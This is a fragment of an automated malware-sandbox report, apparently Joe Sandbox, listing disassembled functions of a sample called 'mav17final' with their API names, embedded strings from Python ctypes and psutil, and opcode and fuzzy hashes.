                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$_errno$Eval_FromOccurredSaveStringThreadWindowsffi_callffi_prep_cif
                                                  • String ID: No ffi_type for result$ctypes.seh_exception$exception: access violation reading %p$exception: access violation writing %p$exception: breakpoint encountered$exception: datatype misalignment$exception: single step$ffi_prep_cif failed
                                                  • API String ID: 1937973484-2749438402
                                                  • Opcode ID: 430c0edaa122ef19808d40242a936452debd4f228559f93505334d9254383600
                                                  • Instruction ID: d12de5b110c7a1d880a6d5543bcc066dd4d4aeaa1f2bc7f1058f52d8215207db
                                                  • Opcode Fuzzy Hash: 430c0edaa122ef19808d40242a936452debd4f228559f93505334d9254383600
                                                  • Instruction Fuzzy Hash: B6813D32A08BC286E660CF19E8446B96BA1FF45BE6F546039DB5E437A4DF7CE844C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorLast$CloseCodeExitHandleProcess
                                                  • String ID: GetExitCodeProcess$GetExitCodeProcess != STILL_ACTIVE$GetExitCodeProcess -> ERROR_ACCESS_DENIED (ignored)$OpenProcess$OpenProcess -> ERROR_INVALID_PARAMETER$OpenProcess -> ERROR_SUCCESS$OpenProcess -> ERROR_SUCCESS turned into AD$OpenProcess -> ERROR_SUCCESS turned into NSP$psutil-debug [%s:%d]> $psutil/arch/windows/process_utils.c
                                                  • API String ID: 4173993794-1769976570
                                                  • Opcode ID: 4917832fdb2819dc7055f8de02272ff85822ed9d623a28d87c67c9903ffe2f2a
                                                  • Instruction ID: 2900b5f4ea75f70ce33d6012e45db69dbf4abf3023f45c6b758f4ea652b2ee58
                                                  • Opcode Fuzzy Hash: 4917832fdb2819dc7055f8de02272ff85822ed9d623a28d87c67c9903ffe2f2a
                                                  • Instruction Fuzzy Hash: D5512C20F1D5C692EF959F2DF8952B92AA1AF647F0F445036DB0E422A6DE2CE487C350

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: COM method call without VTable$Expected a COM this pointer as first argument$NULL COM pointer access$native com method call without 'this' parameter$this function takes %d argument%s (%d given)$this function takes at least %d argument%s (%d given)
                                                  • API String ID: 0-1981512665
                                                  • Opcode ID: f07b7bceabcce526c4a62d906a5ec0dd6d9bc262e596e910abc21d3a49bdda52
                                                  • Instruction ID: 137ffe4d8d7656e15f6e93c0bf76187713e4c57036b74e94c9b0cab4bba2e1f1
                                                  • Opcode Fuzzy Hash: f07b7bceabcce526c4a62d906a5ec0dd6d9bc262e596e910abc21d3a49bdda52
                                                  • Instruction Fuzzy Hash: CE912926A09BC281EA60CF29E4442B96BA0FF85BE6F546436DF4D47768DF3CE545C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLastProcess$OpenTimes
                                                  • String ID: (ddd)$GetProcessTimes -> ERROR_ACCESS_DENIED$OpenProcess$automatically set for PID 0
                                                  • API String ID: 439304258-3215740380
                                                  • Opcode ID: b3043431e4184d2c3639cdfc297f2aa77ef6b2bf120e7a198ebdad43fd7f5465
                                                  • Instruction ID: 891e2cc6381b688220f143595c9d416779fddddca7caf2a81f85ab76a1ca2acb
                                                  • Opcode Fuzzy Hash: b3043431e4184d2c3639cdfc297f2aa77ef6b2bf120e7a198ebdad43fd7f5465
                                                  • Instruction Fuzzy Hash: 1B416531B1DAC686EE41DF3DA840579A7A6BFA47E0F448231EB1F52695EF3CE4468700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CallDeallocErr_FormatObject_memset
                                                  • String ID: argument %zd: $too many arguments (%zi), maximum is %i
                                                  • API String ID: 1791410686-4072972272
                                                  • Opcode ID: 4740f729d07df1b72c89f8ee573bc102a3c799c06bb822e8bf3e008f4163d2c1
                                                  • Instruction ID: f04de0b2ed425f53fcd88e79a5a167f38f6ff8eec3994a4ed635220ba52b13ae
                                                  • Opcode Fuzzy Hash: 4740f729d07df1b72c89f8ee573bc102a3c799c06bb822e8bf3e008f4163d2c1
                                                  • Instruction Fuzzy Hash: 2DB16F62A09BC285EA649F29D8402B923A0FF06BF9F546631DB6D977D9DF3CE541C300

                                                  Control-flow Graph

                                                  APIs
                                                  • K32EnumProcesses.KERNEL32(?,?,?,?,?,?,00000000,00007FF8B9078203,?,?,?,00007FF8B9071966), ref: 00007FF8B9077DD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: EnumProcesses
                                                  • String ID: psutil-debug [%s:%d]> $psutil/arch/windows/process_utils.c$psutil_get_pids() failed
                                                  • API String ID: 84517404-721664742
                                                  • Opcode ID: 496f7af1095e9932f3dca6ae4bfd7e75e1a19dd7a4ce45f1e72747e8913e23f5
                                                  • Instruction ID: cc6cf918d975103c323afe4401c1015d6f919029e2be6f35bb6477f1348ef8eb
                                                  • Opcode Fuzzy Hash: 496f7af1095e9932f3dca6ae4bfd7e75e1a19dd7a4ce45f1e72747e8913e23f5
                                                  • Instruction Fuzzy Hash: 15316521B096C682EF549F2DE4552756A61BFA8BE1F544036DB0E073A0DE7CE8868350

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: SystemTimes
                                                  • String ID: (ddd)
                                                  • API String ID: 375623090-2401937087
                                                  • Opcode ID: 29ec311d8e1ff67191919b1209f01c79c48eb70a1fab8fecc3dbe41d73d0aba0
                                                  • Instruction ID: 5fabdd11cf6ed3dd916b45cfb64d5fe5683d514f0be5c7a0fa41d6de714ef9eb
                                                  • Opcode Fuzzy Hash: 29ec311d8e1ff67191919b1209f01c79c48eb70a1fab8fecc3dbe41d73d0aba0
                                                  • Instruction Fuzzy Hash: 21116A31A29E814FC553DB399990525E796AFA57D4B548322F50FF1D50E72CE0978B00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: EnumProcesses
                                                  • String ID:
                                                  • API String ID: 84517404-0
                                                  • Opcode ID: 4c91ff0ec2273356573cf0176f4b2079e72363d77241c0c5429492b96c40a274
                                                  • Instruction ID: 27a656cdbb708630621f0c457b15a31276bf0568e0f5c92196b404a0364e5ef3
                                                  • Opcode Fuzzy Hash: 4c91ff0ec2273356573cf0176f4b2079e72363d77241c0c5429492b96c40a274
                                                  • Instruction Fuzzy Hash: 5E115621B096C682EF64CF29A8441396BA1FF98BE0F185035EB4E47764DE3CE447C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073762995.00007FF8BFAB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                                                  • Associated: 00000002.00000002.2073728007.00007FF8BFAB0000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.2073799607.00007FF8BFAB6000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.2073849663.00007FF8BFAB9000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8bfab0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AdminUser
                                                  • String ID:
                                                  • API String ID: 2487005531-0
                                                  • Opcode ID: d0030d7d39ed1f1285109f3f3c4a92fc536e9fee5458ecd4838dc556b7ba0fb5
                                                  • Instruction ID: 589562f61f2adfc1cde80cdba36535f082beed8b657e9c731b96d6230f4919a8
                                                  • Opcode Fuzzy Hash: d0030d7d39ed1f1285109f3f3c4a92fc536e9fee5458ecd4838dc556b7ba0fb5
                                                  • Instruction Fuzzy Hash: 14F0F9B2108F45D9C702CF59E45109DB724F755BC8B418A22EF8D53B29CF38D091CA40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073762995.00007FF8BFAB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                                                  • Associated: 00000002.00000002.2073728007.00007FF8BFAB0000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.2073799607.00007FF8BFAB6000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000002.00000002.2073849663.00007FF8BFAB9000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8bfab0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID:
                                                  • API String ID: 3510742995-0
                                                  • Opcode ID: b007cc5a7efe170316438a21b032e88e071ebebb1f436b5cacc6e359ddb69198
                                                  • Instruction ID: a21a340d984cdb8395b4d2466585f26a21f8974a26e8e38b89f254531b477704
                                                  • Opcode Fuzzy Hash: b007cc5a7efe170316438a21b032e88e071ebebb1f436b5cacc6e359ddb69198
                                                  • Instruction Fuzzy Hash: A0518D72B04F8585DB28CFA9D4415A933A8FB49BE8B559222EF2D0779ADF38D452C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ErrorProcess$Last$MemoryRead$Query$InformationOpenStatusVirtual
                                                  • String ID: (originated from %s)$NtQueryInformationProcess(ProcessBasicInformation)$NtQueryInformationProcess(ProcessWow64Information)$OpenProcess$VirtualQueryEx$automatically set for PID 0
                                                  • API String ID: 3746328393-2577306957
                                                  • Opcode ID: 60ad0263dde9d9d4aabe87fb791252ebf2ef1ca0c33daef83303b80fb3f24a23
                                                  • Instruction ID: 4e3dbba5332e1f47d29880050d0f0fc9a9e238576bf6a86a66718727637bc0d2
                                                  • Opcode Fuzzy Hash: 60ad0263dde9d9d4aabe87fb791252ebf2ef1ca0c33daef83303b80fb3f24a23
                                                  • Instruction Fuzzy Hash: 5FA16E21B08AC282EF649F2DA8546BD2B61BF64BE4F404131DF1E476A8DF3CE5479350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free$Handle$AllocCloseCriticalInformationQuerySectionSystem$CreateCurrentDuplicateEnterErrorLastLeaveThread
                                                  • String ID: NtQuerySystemInformation$SystemExtendedHandleInformation buffer too big
                                                  • API String ID: 1610506324-122811375
                                                  • Opcode ID: 23bd3201bfe8e194a530111dde7cb7d9009c5d267a9dd5dcae8a74e34f207bab
                                                  • Instruction ID: 3b851517d221fa1313d6a29a7267646cd8771a2b75276107d66c1e2cae98c3b0
                                                  • Opcode Fuzzy Hash: 23bd3201bfe8e194a530111dde7cb7d9009c5d267a9dd5dcae8a74e34f207bab
                                                  • Instruction Fuzzy Hash: 17914D31A08AC681EE549F6AE8583792BA5BF65BE5F404435CB5E437A0EF3CE446C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$CloseHandle$AllocFreeMemoryQueryVirtual$ErrorLastOpen
                                                  • String ID: NtQueryVirtualMemory -> STATUS_ACCESS_DENIED$NtQueryVirtualMemory bufsize is too large$NtQueryVirtualMemory(MemoryWorkingSetInformation)$OpenProcess$automatically set for PID 0$psutil_pid_is_running -> 0
                                                  • API String ID: 2640067250-943580704
                                                  • Opcode ID: ebd61d9221d57dc638e02f8ad4ad6f0fdd8e08548c923c5a7d7a68149336ff86
                                                  • Instruction ID: 7ca06a2079535b7b68da6c5cad6e820051d82dbbfbb317c4910964ce49d7f9ce
                                                  • Opcode Fuzzy Hash: ebd61d9221d57dc638e02f8ad4ad6f0fdd8e08548c923c5a7d7a68149336ff86
                                                  • Instruction Fuzzy Hash: 26613221A096C696FF509F2EA8542796B91BF69BF1F488435CB4E43794EE3CE447C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorLast$CloseControlDeviceHandleswprintf_s$CreateFile
                                                  • String ID: $(IILLKK)$DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i$DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i$PhysicalDrive%i$\\.\PhysicalDrive%d$psutil-debug [%s:%d]> $psutil/arch/windows/disk.c
                                                  • API String ID: 4154591606-594890268
                                                  • Opcode ID: fb760e5c1ffcda8e2c85039de333cfd78706c0c72841b6d628fcc3194f71e0ac
                                                  • Instruction ID: 743e2dfe0cf32e3276c6114e0068cded8749bbf7dbfe94c1bdfbcce507a7cc92
                                                  • Opcode Fuzzy Hash: fb760e5c1ffcda8e2c85039de333cfd78706c0c72841b6d628fcc3194f71e0ac
                                                  • Instruction Fuzzy Hash: 32911D31A09BC682EF609F29E4546BA7BA4FBA4BE0F404536DB5D42B94DF3CE546C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$Drive$LogicalStringsType
                                                  • String ID: (ssssIi)$,compressed$,readonly$A:\
                                                  • API String ID: 1858615190-2665560882
                                                  • Opcode ID: 324f283dc96aaf79baf5b8741b53a9d30ac7edbd6d79a2edb2edf0179091d86f
                                                  • Instruction ID: 2c11bdaa15cdd0b352e1ce1ddc2239f1319b1842adce90d1c527aee723bbc50f
                                                  • Opcode Fuzzy Hash: 324f283dc96aaf79baf5b8741b53a9d30ac7edbd6d79a2edb2edf0179091d86f
                                                  • Instruction Fuzzy Hash: 3EC15D31A08AC686EF249F28E8483B96BA0FF65BE4F444535DB5E46694DF3CE50AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ThreadThread32$FirstNextOpenTimes
                                                  • String ID: CreateToolhelp32Snapshot$GetThreadTimes$Thread32First$forced for PID 0$kdd$psutil_pid_is_running -> 0
                                                  • API String ID: 2004732974-1899450870
                                                  • Opcode ID: 5c05b741d32a9e74ae1e37773a437aa9a54614c169c7061445edb5306e85afe8
                                                  • Instruction ID: e50be29f983c82cdf48ff53bd0950bdba31d26d83b0d3e0b4a6f8212ac801b74
                                                  • Opcode Fuzzy Hash: 5c05b741d32a9e74ae1e37773a437aa9a54614c169c7061445edb5306e85afe8
                                                  • Instruction Fuzzy Hash: E6718431A08AC686EE51DF3DE854279A7A5FFA4BE0F444231EB5E42694EF3CE446C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$Process$InformationQuery$ErrorLastOpen
                                                  • String ID: NtQueryInformationProcess(ProcessBasicInformation)$NtQueryInformationProcess(ProcessBasicInformation) -> STATUS_NOT_FOUND$NtQueryInformationProcess(ProcessCommandLineInformation)$OpenProcess$automatically set for PID 0$requires Windows 8.1+
                                                  • API String ID: 2499767732-710783819
                                                  • Opcode ID: 1883265a9de43d32804f2f34731455dbb28d37745193e24d4b2dd825a0e20e50
                                                  • Instruction ID: 6b9ca8fe408f072c8c99da143c07e8dd251ff3fe95e479bf6004d4777dc5e8f9
                                                  • Opcode Fuzzy Hash: 1883265a9de43d32804f2f34731455dbb28d37745193e24d4b2dd825a0e20e50
                                                  • Instruction Fuzzy Hash: 9A514921A08A8281FE549F2AE8542792BA1BF69BF0F544131DB5E477A4EE3CE487C351
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystemfprintf
                                                  • String ID: GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$NtQuerySystemInformation(SystemInterruptInformation)$NtQuerySystemInformation(SystemPerformanceInformation)$NtQuerySystemInformation(SystemProcessorPerformanceInformation)$kkkk$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  • API String ID: 4178052153-892315520
                                                  • Opcode ID: a8280bf19d9845c31920fb1052be415145c37dff5d34ef6775ebd0b2bf8e894c
                                                  • Instruction ID: e6bf6dbf5634cb015697f079556613ab338cce180afe44009e932de5d54295b3
                                                  • Opcode Fuzzy Hash: a8280bf19d9845c31920fb1052be415145c37dff5d34ef6775ebd0b2bf8e894c
                                                  • Instruction Fuzzy Hash: 6EB1C371A18A8687EF119F2DE4441B96BA0FFA5BE9B404232DB1E52760EF3CF546C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree$ErrorFileLastObjectQueryType
                                                  • String ID: NtQuerySystemInformation
                                                  • API String ID: 153063055-2549949336
                                                  • Opcode ID: d0fe6c8589d1fec388b321b26f75b63068b38b3295e68ecc0905a5dfb750dbf5
                                                  • Instruction ID: 46945d3040edc262dea9b338e6730e381047a033dfa596495543e058ab9e94bf
                                                  • Opcode Fuzzy Hash: d0fe6c8589d1fec388b321b26f75b63068b38b3295e68ecc0905a5dfb750dbf5
                                                  • Instruction Fuzzy Hash: E5315A30B08B8282EE549F6AB8442392BA1FF69BE1F554435CB4E477A1EF3DE4468301
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseEnumErrorHandleLastServiceServicesStatus$ManagerOpen
                                                  • String ID: (OO)$(originated from %s)$OpenSCManager
                                                  • API String ID: 2999948660-3715750162
                                                  • Opcode ID: 27637bdd0ad7537abde288dd67001ff09bcbbe8bc61dc3196441b72dbecfe48b
                                                  • Instruction ID: 4311231500f20129c61ca20eb56d3e4755265c05d096c4b15bbaf66235685861
                                                  • Opcode Fuzzy Hash: 27637bdd0ad7537abde288dd67001ff09bcbbe8bc61dc3196441b72dbecfe48b
